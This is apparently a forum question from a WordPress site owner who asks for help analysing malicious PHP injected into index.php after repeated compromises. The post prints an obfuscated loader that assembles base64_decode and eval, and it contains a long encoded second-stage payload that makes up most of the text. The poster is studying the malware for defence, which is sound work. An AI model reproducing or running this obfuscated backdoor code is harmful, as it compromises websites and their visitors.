# Assistance to understand and resolve malicious code in my WordPress index.php

Tags: php, wordpress

I had a WordPress site that was hacked twice in a matter of 10 days. In both cases, I found an admin account that somehow created, even though I had the registration disabled and obviously, when enabled, the default role would be “Subscriber”

In addition, two files were locked and could not delete them; one of them the index.php contained some malicious code, and the second is the .htaccess which was intact. Their permissions changed to 0444 and no matter how many times I changed the permissions to delete them, something recreated them immediately. Tech support suggested that they recreate my account from scratch. I had to reinstall the site, twice due to the same problem.

Please note that my passwords are very strong and are 20 mixed characters. I also changed the name of the database the user and the passwords (database user and WordPress admin)

I researched the code and could find more than it is a malicious code; no explanation on what it does and who is behind it!

I gave up and deleted all folders, files and database.

I decided to take a shot at the code injected in index.php. Therefore, I will divide it into parts to better give you an idea on what I did. Note that the malicious code comes right before the original WordPress code.

**Code part 1**

```
    $O00OO0=urldecode("%6E1%7A%62%2F%6D%615%5C%76%740%6928%2D%70%78%75%71%79%2A6%6C%72%6B%64%679%5F%65%68%63%73%77%6F4%2B%6637%6A");
$O00O0O=$O00OO0{3}.$O00OO0{6}.$O00OO0{33}.$O00OO0{30};
$O0OO00=$O00OO0{33}.$O00OO0{10}.$O00OO0{24}.$O00OO0{10}.$O00OO0{24};
$OO0O00=$O0OO00{0}.$O00OO0{18}.$O00OO0{3}.$O0OO00{0}.$O0OO00{1}.$O00OO0{24};
$OO0000=$O00OO0{7}.$O00OO0{13};
$O00O0O.=$O00OO0{22}.$O00OO0{36}.$O00OO0{29}.$O00OO0{26}.$O00OO0{30}.$O00OO0{32}.$O00OO0{35}.$O00OO0{26}.$O00OO0{30};
```

**Code part 2 (Will include the long string later on)**

```
eval($O00O0O(LONG STRING IS HERE));
```

For the sake of clarity and ease of reading, I substituted the variables of “O” and zeros.

**Code part 1**

```
    $var=urldecode("%6E1%7A%62%2F%6D%615%5C%76%740%6928%2D%70%78%75%71%79%2A6%6C%72%6B%64%679%5F%65%68%63%73%77%6F4%2B%6637%6A");
$var1=$var{3}.$var{6}.$var{33}.$var{30};
$var2=$var{33}.$var{10}.$var{24}.$var{10}.$var{24};
$var3=$var2{0}.$var{18}.$var{3}.$var2{0}.$var2{1}.$var{24};
$var4=$var{7}.$var{13};
$var1.=$var{22}.$var{36}.$var{29}.$var{26}.$var{30}.$var{32}.$var{35}.$var{26}.$var{30};
```

**Code part 2**

```
eval($var1(LONG STRING IS HERE));
```

Computing the variables results in:

```
VAR => n1zb/ma5\vt0i28-pxuqy*6lrkdg9_ehcswo4+f37j
VAR1 => base64_decode
VAR2 => strtr
VAR3 => substr
VAR4 => 52
```

Replacing the variable $var1 in Code part 2 with the computed values, results in:

```
eval(base64_decode (LONG STRING IS HERE));
```

Now let us dive into the Code part 2. Computing the base64_decode of the long string results in a different long string (again, I substituted the variable found at the beginning and end of the long string for clarity; $O0O000 => $var5 ):

```
$var5="DgIVMdtECBebnJWcGPzUQwXloKuhxiqLyAsfRjmSOprakNHFTZvYMqwhXAzOBuFdHQvTCoaRpYIZineytlbcPGUJmSWLsKjVNkfxgrDEoM9YVfGqMpiNVWmKTlG9wBTHsY0nQCy0AfuJA2hlwM0qQ2y0AfGHsY0nVvEiVIkJVfm0TfXinLZ7MpiqQCy0AfGqoLGHVfm0TfXHsY0nJvhUT2h7MpiqQCy0AfGqoLGHVfm0TBT7MpK9MpiNT211TWZJAC1YwM0qT21PrIx1rIk0I3hPVLqKsY0nVvEiQfkzAIQKI3mzTM09QPTKFY0nwBGqwBmadIhPVh90dIG9QP8HsY0nJp0nQfXqoLGHElTeQ2xargEHclT0I2RHclAeE29NrLT7MpiNT211TWNqoLGNTPqNT211TWZJAC1YngUkBWr1dWk0Vv9ewfkzTWhtAvhaAx91TWNinIUkBlGqwBuKrlGiVIkarIpiQx9gmhQvmhQdQ1QxRhhxR1mJhhQQQ10KnIUkBlGqwBGqwBGqQfkzAIQKwM0qQx9gmhQvmhQdQ1QxRhhxR1mJhhQQQ107MpiqwBGqJvhUT2h7MpiqwBGqwBGqwCZWnCZaT2h0nBmJR0hLhNhLvPAyTWA2Q10KnIUkBlGqwBGqwBGqwBGqwBmadIhPVLG9wBmJR0hLhNhLvPApLxuJR0hXmlAAwB4qQa8HwB4qQx9gmhQvmhQdQ2xPr3EHIhUYIgUkBlGqwBGqwBGqJvhUT2h7MpiqwBGqwBGqwBGqwBGNT211TWNqoLGNI1kxRZrxRZUHROypI1kxgOEHILGewBT/QPGewBmJR0hLhNhLvPAmhRhLvh9ghxQQgNTHIgUkBlGqwBGqwBGqJp0nwBGqwf0kBlGqwBuPrIm1TW4qQfkzAIQKsY0nJp0nQCADA2hlwM0qQ3m3rv50FL10VfQZrgOeACxjVvmiAv5HcHy5FlT7MpiNTCxaT3ADTWpqoLuzrMRidvp1nOGNI0AxhxUHTCpHILNKsY0nVvEqnBmYEIkaA29PrBG9oLGHkvrlrSX2rSrlXgG3XCxZEaE1rSGYE2w4rgX1EaZSEapHnLu7MpiqwBGqQCxNrx9Sd250rv50wM0qpBmJm0hRvPAzEIueEv1ZQ107MpiqwBGqQCxSACZDdlG9wOGNI0AxhxUHEvk0Vv9eQ107MpiqwBGqQCmDdvxKdlG9wOGNI0AxhxUHrC9zEvZeQ107MpiqwBGqVvEiQCmDdvxKdlZ7MpiqwBGqwBGqwBmid3k0wM0qQCmDdvxKdSUkBlGqwBu9rvtarIUkBlGqwBGqwBGqQCyDT3pqoLGNI1kxRZrxRZUHLxmRRx9wg1kRQ107MpiqwBGqJp0nwBGqwB8DQCyDT3pqoLGNI1kxRZrxRZUHLxmRRx9wg1kRQ107MpiqwBGqQfuyACqqoLuNVIQeEv1Znx9JmNZXmh9JngUkBlGqwBuKrlqNEvk0Vv9eog0HTCZerPTKFY0nwBGqwBGqwBGDc2y0Afuasl8DA3A3cWADd2AUrL5Sd20DTCZera9aVImZdvxYovy0Afuasl8DrIyydIuUrL5Sd20DT2Z0rv1yTB54dvYkBlGqwBGqwBGqVvEiT3mPT3mPnBmyrCmJE29eACheABYHcHyzdBTKnIUkBlGqwBGqwBGqwBGqwCZWnCZaI2y0AfuanBNKFY0nwBGqwBGqwBGqwBGqwBGqwBmNEImyI25ZAPG9wBAiAfmYTaiDc3A3AP5Hd29HdCReE29zc3uKdWT/T2Z0rv1yTM0HclAiAfmYTaiDcPTeQCyDT3peQP8HclmyrCmJE29eACheAMUkBlGqwBGqwBGqwBGqwf1ZdfkZFY0nwBGqwBGqwBGqwBGqwBGqwBmNEImyI25ZAPG9wBAiAfmYTaiDc3A3AP5Hd29HdCReE29zc3uKdWT/T2Z0rv1yTM0HclAiAfmYsl8DQP4NVC9aAB4HcPTeQCxNrx9Sd250rv50sY0nwBGqwBGqwBGqwBGqJp0nwBGqwBGqwBGqwBGqcP9gVImZdvxYsluiAfmYsl8DA3A3cWA1rCxer3kZVCx0cWkDdL9zEIuKdWmZFB54dvYkBlGqwBGqwBGqwBGqwCZWnfk0TWZaAfwiT21DAImNdPqNrCx0Eh9erITKcBAHd29HdCRHnLZ7MpiqwBGqwBGqwBGqwBGqwBGqrvkidPGHoCQPoW9joCQPolT7MpiqwBGqwBGqwBGqwBu9rvtarIUkBlGqwBGqwBGqwBGqwBGqwBuZE2yDwBmNEImyI25ZAP4HoCQPoHuKdWTqrWxUT2RyoCQPolT7MpiqwBGqwBGqwBGqwBu9MpiqwBGqwBGqwf1ZdfkZFY0nwBGqwBGqwBGqwBGqrvkidPGHoCQPoHkKAChzEIGqdWxzrLuWEvtarLO8EHw+QaUkBlGqwBGqwBGqJp0nwBGqwBGqwBuZFCZ0sY0nwBGqwf0kBq0nwBGqwBmWVvtZI3uyACqqoLGNTCx0VB4Hc3QDEW90TP50FfpHsY0nwBGqwCZWnBONEvk0Vv9enIUkBlGqwBGqwBGqQCxSACZDdlG9wBAYAIpHsY0nwBGqwf0kBlGqwBuKrlqNEvk0Vv9ewM09wBAYAIpHnIUkBlGqwBGqwBGqVvEiT3mPT3mPnBmyrCmJE29eACheABYHcHyzdBTKnIUkBlGqwBGqwBGqwBGqwCZWnCrKdChJrIyKT3manBmWVvtZI3uyACqKnIUkBlGqwBGqwBGqwBGqwBGqwBGNrCx0ELG9wfkzd3h0rC8iQCrKdChJTCx0VBN7MpiqwBGqwBGqwBGqwBu9rvtarIUkBlGqwBGqwBGqwBGqwBGqwBGNrCx0ELG9wBAhT2hPcvxHrv50slGbMpKudCtDAaiqcPT7MpiqwBGqwBGqwBGqwBu9MpiqwBGqwBGqwBGqwBuKrlyaAfQaAfwiQCmyACOUQP8HclmyrCmJE29eACheABNKFY0nwBGqwBGqwBGqwBGqwBGqwChSVC8qQatlTS5aVImZdvxYwCxUTWhyrfNqEvmNrvpyoCQPolT7MpiqwBGqwBGqwBGqwBu9rvtarIUkBlGqwBGqwBGqwBGqwBGqwBuKrlyKT19iAfmYTPqKnIUkBlGqwBGqwBGqwBGqwBGqwBGqwBGqQCmyACxJdWh3wM0qAfQKdLqNrCx0ELNewZtPIC4lclAgVImZdvxYsluiAfmYTaiDcPTeQCyDT3peQP8HclmyrCmJE29eACheAMUkBlGqwBGqwBGqwBGqwBGqwBu9rvtarIUkBlGqwBGqwBGqwBGqwBGqwBGqwBGqQCmyACxJdWh3wM0qAfQKdLqNrCx0ELNewZtPIC4lclAgVImZdvxYsluiAfmYsl8DQP4NVC9aAB4HcPTeQCxNrx9Sd250rv50sY0nwBGqwBGqwBGqwBGqwBGqwf0kBlGqwBGqwBGqwBGqwBGqwBGDc1kKAChzEIG6wCy0AfG6cP93A3Ter3hNEv5HT2hiEIpeE29zc21yTCZerCh4cHyzdG0nwBGqwBGqwBGqwBGqwBGqwCZWnCrKdChJTfh0I2kDdHmZdHmanBmWVvtZI3uyACqUQCmyACxJdWh3nLNqFY0nwBGqwBGqwBGqwBGqwBGqwBGqwBuZE2yDwBT8EHw+d2U8EHw+QaUkBlGqwBGqwBGqwBGqwBGqwBu9rvtarIUkBlGqwBGqwBGqwBGqwBGqwBGqwBGqrvkidPGHoCQPoWrKdCRqA3QKACRqrWxUT2RyoCQPolT7MpiqwBGqwBGqwBGqwBGqwBGqJp0nwBGqwBGqwBGqwBGqJp0nwBGqwBGqwBu9rvtarIUkBlGqwBGqwBGqwBGqwChSVC8qQatlTS5aVImZdvxYwC5ydvRqrWxUT2RyoCQPolT7MpiqwBGqwBGqwf0kBlGqwBGqwBGqVvEqnfk0THk0TlqNEvmNI2kDdHmZdHpUwBTeTCyYQPNKwfUkBqNQBLmywM0qdvp1nC1NkLyGQx9fmhmdQ2OHILNKsY0nBpNQQCwqoLuzrMRidvp1nOGNI0AxhxUHElAAnLN7MpiQBpZKrlqNEg09T21DAImNdPqHVfm0TMiDcPTeQCADA2hlclTDEL5YVfGHnLu8JBGNES09QawtEamNXMXtrCpPsgNYXgX1kWO5XvwarvrSE2OYXgXYQPZ7MpiQBpNQQfkzT3mPwM0qpBmJm0hRvPAadIk0TlAAsY0nBpNQBvZWnCrKdChJTfh0I2kDdHmZdHmanBmYEImiwB4qQP8HwB4qQCxNrx9Sd250rv50cBGNT21aAfwKnIUkBqNQBpNQrvkidPGHd2UHsY0nBpNQBI0kBqNQBI0kBlGqwBGqwBGqJp0nwBGqwf0kBlGqwBuKrlqNEvk0Vv9ewM09wBANrvYHnIUkBlGqwBGqwBGqVvEirWZUrh9ZFCZaAfXiQCrKdChJTCx0VBNKFY0nwBGqwBGqwBGqwBGqQCmyACOqoLuadv91ACmDnBmWVvtZI3uyACqKsY0nwBGqwBGqwBu9rvtarIUkBlGqwBGqwBGqwBGqwBmNEImywM0qQPT7MpiqwBGqwBGqwf0kBlGqwBGqwBGqVvEiT3mPT3mPnBmNEImycBTDQP4NEvmNI2kDdHmZdHpKnIUkBlGqwBGqwBGqwBGqwCZWnCZaI2y0AfuanBNKFY0nwBGqwBGqwBGqwBGqwBGqwBmNEImyI25ZAPG9wfmPVv0iQCmyACOKclQTTZtewl4HR2Z0rv1yTMiqVfm0TfX6cP8Hclmid3k0clTDQP4NEvmNI2kDdHmZdHp7MpiqwBGqwBGqwBGqwBu9rvtarIUkBlGqwBGqwBGqwBGqwBGqwBGNrCx0Eh9erITqoLu0TWZznBmNEImynL4lIfQTdlweQ1kKAChzEIG6wCy0AfG6cP8Hclmid3k0clTDQP4NEvmNI2kDdHmZdHp7MpiqwBGqwBGqwBGqwBu9MpiqwBGqwBGqwBGqwBuKrlyWVvtZI3u1Ax9Sd250rv50TPqNrWZUrh9YEImicBmNEImyI25ZAPNKwfUkBlGqwBGqwBGqwBGqwBGqwBuZE2yDwBT8EHw+d2U8EHw+QaUkBlGqwBGqwBGqwBGqwf1ZdfkZFY0nwBGqwBGqwBGqwBGqwBGqwChSVC8qQatlTS5WVvtZwfAPVImZwCrydfkZwgtlTS4HsY0nwBGqwBGqwBGqwBGqJp0nwBGqwBGqwBu9rvtarIUkBlGqwBGqwBGqwBGqwChSVC8qQatlTS5aVImZdvxYwCmDrIXqdW90wCh4VIk0wgtlTS4HsY0nwBGqwBGqwBu9MpiqwBGqJp0nMpiqwBGqrIyKAMUkBH0kBWr1dWk0Vv9ewCZaI2y0AfuanBNqFY0nwBGqwCZWwBqqwvhzTfm5nBmJR0hLhNhLvPAwhxmpRPAAnLGWQluaAfQ0d2tDA2hPnBmJR0hLhNhLvPAwhxmpRPAAnLGyog0qQ29WrlTKwfUkBlGqwBGqwBGqTWh0AIQewfmPAvR7MpiqwBGqJLuZdfkZVvEqnBuKT3kZABqNI1kxRZrxRZUHLxmRRx9EI0roRZAuRNmxmx9pRN9RgPAAnLGWQlGNI1kxRZrxRZUHLxmRRx9EI0roRZAuRNmxmx9pRN9RgPAAwM09oLGHVfm0TfXHwBNqFY0nwBGqwBGqwBuPrIm1TW4qAfQ1rgUkBlGqwBu9wChUT2hKrlGiwBxZdIu0FLqNI1kxRZrxRZUHLxmRRx9CRN9shx9xgNmJLxmRRxXHILNqQlEqT3mPAC9Ud3AZTlqNI1kxRZrxRZUHLxmRRx9CRN9shx9xgNmJLxmRRxXHILNqwg09wBADrWEHnLu7MpiqwBGqwBGqwfQZAfhPdlu0THhZsY0nwBGqwf0kBlGqwBuPrIm1TW4qrWxUT2R7MpK9MpiNAChzTBG9wOGNI0AxhxUHT210rv1YQ107MpiNVvpqoLuGQx9fmhmdQ3kzVvpHIgUkBlmaVImZwM0qpBmJm0hRvPAadIkKACRHIgUkBlmYEvAZwM0qpBmJm0hRvPAadIuyr2RHIgUkBlmaVImZwM0qT3mPI3QZTCtyE2RiQP8HcBTHcBmaVImZngUkBlmid3k0wM0qQx9gmhQvmhQdQ0yRhxuJLO9ghBAAsY0nQCkUd2kjwM0qQPT7MpikBlm0rv1YA2hlwM0qpBmJm0hRvPA0rv1YA2hlQ107MpiNAChzTfAZElG9wfk0TZ9PrIuUEvkZnBTDQPYHQPYNAChzTfAZElN7MpikBWZWnBm0rv1YA2hlnIUkBlGqwBGNT2Z0rLG9wBm0rv1YA2hlvauAclm0rv1YA2hlvaxAclm0rv1YA2hlvaQAsY0nwBGqwBm0rv1YwM0qT3hlT3mPnBm0rv1YA2hlcMXKsY0nJp0nQCtydWTqoLGNI1kxRZrxRZUlLxmRRx9up0kxRxmJgOxsm1hum0RlIgUkBlmUEv5HwM0qQfXiQCtydWTKsY0nQC9awM0qQx9gmhQvmhQdQ0yRhxuJhhkxRZ9um0hshBAAsY0nQC9awM0qQfXiQC9angUkBWZWnCZaT2h0nBmJR0hLhNhLvPAwhxmpI1QxmNhLmhwHILNKFY0nwBGqwBm1TWtaVCxerPG9wBmJR0hLhNhLvPAwhxmpI1QxmNhLmhwHIgUkBlGqwBGNAIQUT2yydWTqoLGNTPqNAIQUT2yydWTKsY0nJvhUT2h7MpiqwBGqQfhPdfkiEv5HwM0qQPT7MpK9MpikBWZWnCAZACheAlqHRNhkg1mxI0xOmxwHnLGWQluaAfQSEIkZE21YnCAZACheAlqHRNhkg1mxI0xOmxwHnLYqQ3heV25DA24HnLNqFY0nwBGqwBmSdC9SVPG9wCAZACheAlqHRNhkg1mxI0xOmxwHngUkBH0qrvtarvZWnCZaT2h0nBmJR0hLhNhLvPALmR1ohOhJpRmORlAAnLGWQlGNI1kxRZrxRZUHRNhkg1mxI0xOmxwHILGWQluaAfQSEIkZE21YnBmJR0hLhNhLvPALmR1ohOhJpRmORlAAcBGHAv5jdW93dlTKnLu7MpiqwBGqQCkUd2kjwM0qQx9gmhQvmhQdQ1QxgR9Rmh9umOmLQ107MpK9MpikBlmiAfmYI2kUd2kjwM0qQPT7MpKKrlyHrImZdHEiQ0yRhxuJp0tQmR5RI0ZpQPNqQlEqT3mPE2xarvkzTByHrImZdHEiQ0yRhxuJp0tQmR5RI0ZpQPNUwBA1dWzed3AeQPNKwfUkBlGqwBGNVfm0Tx9SdC9SVPG9wCAZACheAlqHLxmRRx9MgOZxgZmJLhGHngUkBH0qrvtarvZWnCAZACheAlqHLxmRRx9EI0roRZAuRNmxmx9Cg1wHnLGWQluaAfQSEIkZE21YnCAZACheAlqHLxmRRx9EI0roRZAuRNmxmx9Cg1wHnLYqQ3heV25DA24HnLNqFY0nwBGqwBmiAfmYI2kUd2kjwM0qr2h0rv52nBAwhxmpI1yJmN9Lh0xLmOhOI0roRlTKsY0nJp0nMpKKrlyaAfQKT3mPnBmSdC9SVPYHcBTKnIUkBlGqwBGNE2tDE2zJAC1YwM0qrIyYdC9NrLqlcBwUQCkUd2kjngUkBlGqwBGNE2tDE2UqoLGNE2tDE2zJAC1YvauAsY0nJp0nMpKKrlqyVIkarIpiQfkKAChzEIuJrWZUrLNqJfYqpBmaVImZdvxYI2rKdCR9oLTHnIUkBlGqwBGNT2Z0rv1yTx9WVvtZwM0qQ3kKAChzEIGHsY0nJp0nVvEiwvZaT2h0nBmzEIueAv0Kwft8wOGNdvxYdHhzog0HQPZ7MpiqwBGqQfkKAChzEIuJrWZUrLG9wMwYXMG7MpK9MpikBq0nVvEiTfQZr19zEImSVBqHc14HclQTcPweQfkKAChzEIuJrWZUrL4Hnx9dXL01ILN/cHyzdBpDVLTUQfkzAIQKI3mzTBYNAIQKEIQPnLZ7MpiqwBGqpCyZEvmZTlqlp29eACheAB10FIuZslu0rIy0c3yzdBwKsY0nwBGqwCZWnCZaT2h0nBm1TWZyTHQdXh0KnIUkBlGqwBGqwBGqQCZNwM0qT3mPI3QZTCtyE2RiQ18HcBTHcBm1TWZyTHQdXh0KsY0nwBGqwf1ZdfkZFY0nwBGqwBGqwBGNVvpqoLGtXMG7MpiqwBGqJp0nwBGqwBmKAW1yTCZNwM0qXMUkBlGqwBuaVImZdvxYI291ABy6I3kKAChzEIGiQCADA2hlcBmKrBYNVC9aABYNrfpUQCZ2dvxYVvpUQC1yTC51dLYNVfm0Tx93rvwKcBmid3k0ngUkBlGqwBuZFCZ0nBN7MpK9MpKWAv5SACZDdlu6I3kKAChzEIGiQCADA2hlcBmKrBYNVC9aABYNrfpUQC1yTfm5TCRUQC1yTx9eAv0UQCy0AfuJA2hloLAiAfmYQPYNrWZUrIm5TCR9XBYNdvxYI3kYdCZ0T19eAv09QPTUQfmZdIG9QPTUQCmyACxsrIT9QPTKFY0nwBGqwBm3rvwqoLGNVfm0Tx93rvweQaiDcPTeQCADA2hlclTDT2Z0rv1yTCm0dl5YVfG/rCx0rg0HclmKrB4HQHmZdIG9QP4NAChzTB4HQHAZES0Hclmid3k0clTWFC1UoLTeQCm0clTWdvxYAfZYrg0HclmzEIu0FIuZclTWrWZUrIm5TCR9QP4NrWZUrIm5TCReQPrzEIuJT3uUVImaI251dg0HclmzEIuJT3uUVImaI251dL4HQW1yTx9eAv09QP4NdvxYI251dL4HQWmyACxsrIT9QP4NrCx0ER5ZAaUkBlGqwBuPrIm1TW4qAfQKdLyadv91ACmDnBm3rvwKngUkBH0kBWr1dWk0Vv9ewfkKAChzEIuJd3h0nBm1TWYUQCyDT3pKFY0nwBGqwCZWnCZaI2y0AfuanBNKFY0nwBGqwBGqwBGNVfm0TBG9wBAiAfmYTPT7MpiqwBGqJvhUT2h7MpiqwBGqwBGqwBmiAfmYwM0qQ2y0AfGHsY0nwBGqwf0kBlGqwBGNrCx0rh9aAfwqoLGqrCx0rLqlvL1zcvmThOq6VgKaRBwUACZzrLqKngUkBlGqwBGNT2Z0rv1yTx9irvxNrIwqoLGHoM94dvYqAWhPT2ZDdS0lXL4YwluZdWkDrCZera0lhhmCcgqloa4kBSt1TWtarIpkBlGqwBGqwfyzdC5aoLQiAfmYsl8DA3A3cHkKAChzEIuacW9PrP9aE2yZdvxac3kKAChzEIGDXB45wq0nwBGqwBGqFC1UdHX6FfkKoLQiAfmYsl8DA3A3cHTacW9PrP8PXMGtc1ykgxkSVChzEL1KdHk0Ev5SrLwkBlGqwBGqwfyaVgKaE2yZdvxXd2kyACZDdS0lVfm0TMiDc3A3AP5aVImZdvxYTP5DTWTDT2kirv1yTP9aVImZdvxYcaGesp0nwBGqwBGqwBGqwBGqVfm0TMiDc3A3AP5aVImZdvxYTP5DTWTDT2kirv1yTP9aVImZdvxYcaGesL9aVImZdvxYcHyarBw+QaUkBlGqwBGNT2Z0rv1yTx9irvxNrIwqcS0qQY0nwBG8AIQUoq0nwBGqwMtUd2X+QP4NVfm0TB4Hsl8DQPGewBmid3k0wB4qwl8lwB4qQaYDdC9Soq0nwBGqwMtUEIk0dv9NolTqclGNrCx0rh9aAfwqclGHoB9UEIk0dv9Noq0nwBGqwMtSVCxer2hWTWhtoWmyVvt5oB9SVCxer2hWTWhtoq0nwBGqwMtYTWZDTWZ0Fg4YcSO8c3uPVv9PVIm5oq0nwBG8c3hPdM4HsY0nwBGqwBm1TWtJEIQPwM0qrIyYdC9NrLqlIfQTdlwUQfhPdBN7MpiqwBGqQC1yTx9aAfwqoLGNT2Z0rv1yTx9irvxNrIw7MpiqwBGqrW9PrvxSVBqNAIQUI2xPTluyTPGNAWxUAvRKFY0nwBGqwBGqwBGNdvxYI3k0TlGeoLGHMpiqwMt1TWY+MpiqwBGqoCtDEa4HclmiAfmYclT6cP8HwB4qQCyDT3pqclGlcPwqclm2Evt1rLGeQaYDdC9Soq0nwBGqwMtUEIk0dv9NolTqclGNrCx0rh9aAfwqclGHoB9UEIk0dv9Noq0nwBGqwMtSVCxer2hWTWhtoWmyVvt5oB9SVCxer2hWTWhtoq0nwBGqwMtYTWZDTWZ0Fg4YcSO8c3uPVv9PVIm5oq0nwBG8c3hPdM4HsY0nwBGqwf0kBlGqwBuZE2yDwBmzEIuJT3mPclwkBSYDAIQUT2h0olw7MpK9MpikBq0nMpKKrlyaAfQKT3mPnBmadIhPVh90dIGUQP5ST3XHnLZ7MpiqwBGqQfAZElG9wBmiAfmYI3AZEl4Hsl8DQP4Nr293rvweQP9KdWmZFB5YVfG/AIQUoLTeQfkKACReQPrKrM0HclmKrB4HQHmZdIG9QP4NAChzTB4HQWm0oLTeQCm0clTWA2hloLTeQCyDT3peQPr6FS0HcHkzVIkld3pinL4HQWKNVIw9QP4NVWmKTl4HQWkUd2kjoLTeQCkUd2kjclTWAIQKoLTeQfkzAIQKclTWdCxera0HclmUEv5HclTWd3X9QP4Nd3XeQPr1TWtaVCxera0Hclm1TWtaVCxerP4HQWy0AfuJE2tDE2U9QP4NVfm0Tx9SdC9SVaUkBlGqwBGNVfmzdx9Sd250rv50wM0qAfQKdLyadv91ACmDnBm3rvwKngUkBlGqwBuKrlqyT3mPT3mPnBmiAC1UI2kDdHmZdHpUQ25DEW90AIkZTWxHrv50QPNKFY0nwBGqwBGqwBuKrlyaAfQaAfwiQCy0dvtJE29eACheABYHd2ziAC1Ur2h0E29eACheABTKnIUkBlGqwBGqwBGqwBGqwOuirvxNrIwiwNkDdHmZdHpzAfZYrgiqACh4AB9ST3X7wCkiEIQarIp9AImWcgqlngUkBlGqwBGqwBGqwBGqwBmiAC1UI2kDdHmZdHpqoLuaAfQJTWhYdCxSrLqld2ziAC1Ur2h0E29eACheABwUQPTUQCy0dvtJE29eACheABN7MpiqwBGqwBGqwBGqwBuZE2yDwBmiAC1UI2kDdHmZdHp7MpiqwBGqwBGqwBGqwBuZFCZ0nBN7MpiqwBGqwBGqwf1ZdfkZwCZWnfk0THk0TlqNVfmzdx9Sd250rv50cBAHrImSd250rv50kgGYTCxHrLTKnIUkBlGqwBGqwBGqwBGqwOuirvxNrIwiQ0yRhxGDXL4twMRYXBuQdHmZTW5ydBugrIQ2rIwqmIQPd3wHngUkBlGqwBGqwBGqwBGqwCh4VIpingUkBlGqwBGqwBGqJvhUT2RqVvEiT3mPT3mPnBmiAC1UI2kDdHmZdHpUQ2AZACkDdHmZdHp0XMmYEvAZQPNKFY0nwBGqwBGqwBGqwBGqpCyZEvmZTlqHLxmRRB8tcSOqkMG0wO5DABuCd3herBTKsY0nwBGqwBGqwBGqwBGqrIyKABqKsY0nwBGqwBGqwBu9MpiqwBGqJp0nJp0nMpKZdfkZwCZWnBmaVImZnIUkBlGqwBuKrlqNT2Z0rLG9oLGHFC1UQPZ7MpiqwBGqwBGqwOuirvxNrIwiwNkDdHmZdHpzAfZYrgiqACh4AB9iAC1UsPuSVCxPT2h0oIh0rl04wlN7MpiqwBGqwBGqwBmzEIuNVIwqoLuGQx9fmhmdQ21yTCmKTlAAsY0nwBGqwBGqwBGNdvxYAfZYrLG9wOGNI0AxhxUHdvxYAfZYrLAAsY0nwBGqwBGqwBGNrWZUrIm5TCRqoLuGQx9fmhmdQ2rKdCh0FIuZQ107MpiqwBGqwBGqwBmzEIuJT3uUVImaI251dLG9wOGNI0AxhxUHdvxYI3kYdCZ0T19eAv0HIgUkBlGqwBGqwBGqQC1yTx9eAv0qoLuGQx9fmhmdQ21yTx9eAv0HIgUkBlGqwBGqwBGqQCmyACxsrITqoLuGQx9fmhmdQ2myACxsrITHIgUkBlGqwBGqwBGqVvEiQC1yTCmKTlZ7MpiqwBGqwBGqwBGqwBuKrlqyVIkJrCZPnBmzEIuNVIwKnIUkBlGqwBGqwBGqwBGqwBGqwBuGdvzNVIwiQC1yTCmKTlYYkaT3cfmPAvRKsY0nwBGqwBGqwBGqwBGqwBGqwChSVC8qQ29jwBTeQC1yTCmKTl4Hwfk1E2kZT3XyoCQPolT7MpiqwBGqwBGqwBGqwBu9rvtarIUkBlGqwBGqwBGqwBGqwBGqwBuZE2yDwBmzEIuNVIweQPuydfQZEvm5wCh4VIk0wgtlTS4HsY0nwBGqwBGqwBGqwBGqJp0nwBGqwBGqwBu9MpiqwBGqwBGqwCZWnOGNI0AxhxUHdvxYVv5NrIqHILZ7MpiqwBGqwBGqwBGqwBGNrWZUrvxPTWx5wM0qdCZaAOmKTlqNdvxYrCZPngUkBlGqwBGqwBGqwBGqwCZWnCkDAv50nBmWVvtZEIQPEINKoS0PnIUkBlGqwBGqwBGqwBGqwBGqwBGNdvxYVv5NrIyJT3mPwM0qQPT7MpiqwBGqwBGqwBGqwBGqwBGqQC1yTCZerCh4I3k0TlG9wBT8o3yzdBu2rIQaVv9eoLwtcSGlwCheE29NVv5HoLQhhOEzsBw/oq0nofkKAChzEIuKdWmZFBu4dvteTa0lVfm0TMiDc3A3AP5Hd29HdCReE29zc3kSVChzEIXDT2Z0rv1yTB8YcSq0wS4HsY0nwBGqwBGqwBGqwBGqwBGqwCrDTWhyE2qiQCrKdChyTHQyFLuyTPGNAWxUAvRKFY0nwBGqwBGqwBGqwBGqwBGqwBGqwBuKrlyaAfQKT3mPnBm2Evt1rLYHcHyzdBTKnIUkBlGqwBGqwBGqwBGqwBGqwBGqwBGqwBGqwBmzEIuKdWmZFx9aAfwqcS0qQY0nwBG8T2Z0rv1yTM4kBlGqwBG8dC9SolTewWy0AfG6cP8lclmJR0hLhNhLvPAwhxmpI0yoR1pHIL4lcPweQC1yTCmKTl4HcPTeQfrydfhZclT8c2tDEa4kBlGqoB9aVImZdvxYolT7MpiqwBGqwBGqwBGqwBGqwBGqwBGqwf0kBlGqwBGqwBGqwBGqwBGqwBu9MpiqwBGqwBGqwBGqwBGqwBGqQC1yTCZerCh4I3k0TlGeoLGHMpi8c3kKAChzEIuKdWmZFM4HsY0nwBGqwBGqwBGqwBGqwBGqwBm4dvteEv1ZwM0qpBmJm0hRvPAzEIuKdWmZFBAAclTeFC1UQaUkBlGqwBGqwBGqwBGqwBGqwBGNdIZWVvtZwM0qrW9Yrv4iQfyzdC5ydvRUwBQ3wlN7MpiqwBGqwBGqwBGqwBGqwBGqrHAPVImZnBmzFvrKdCRUwBmzEIuKdWmZFx9aAfwKsY0nwBGqwBGqwBGqwBGqwBGqwCrSdC9arLqNdIZWVvtZngUkBlGqwBGqwBGqwBGqwBGqwBuZE2yDwBQDVatlTS5iAfmYsl8Dwl4NI1kxRZrxRZUHLxmRRx9wg1kRQ10ewl8lclm4dvteEv1ZsY0nwBGqwBGqwBGqwBGqwBGqwB8DrvkidPGloCQPolweQfAZESUkBlGqwBGqwBGqwBGqwBGqwBuZFCZ0sY0nwBGqwBGqwBGqwBGqJvhUT2h7MpiqwBGqwBGqwBGqwBGqwBGqrvkidPGHFC1UwCrKdCRqdChaTPueAv1lrIwqdvxYVv5NrIqqrWxKdCRyQaUkBlGqwBGqwBGqwBGqwBGqwBuZFCZ0sY0nwBGqwBGqwBGqwBGqJp0nwBGqwBGqwBu9MpiqwBGqwBGqwBm3rvwqoLGNVfm0Tx93rvweQaiDcPTeQCADA2hlclTDT2Z0rv1yTB5YVfG/rCx0rg0HclmKrB4HQHmZdIG9QP4NAChzTB4HQHAZES0Hclmid3k0clTWFC1UoLTeQCm0clTWdvxYAfZYrg0HclmzEIu0FIuZclTWrWZUrIm5TCR9QP4NrWZUrIm5TCReQPrzEIuJT3uUVImaI251dg0HclmzEIuJT3uUVImaI251dL4HQW1yTx9eAv09QP4Nd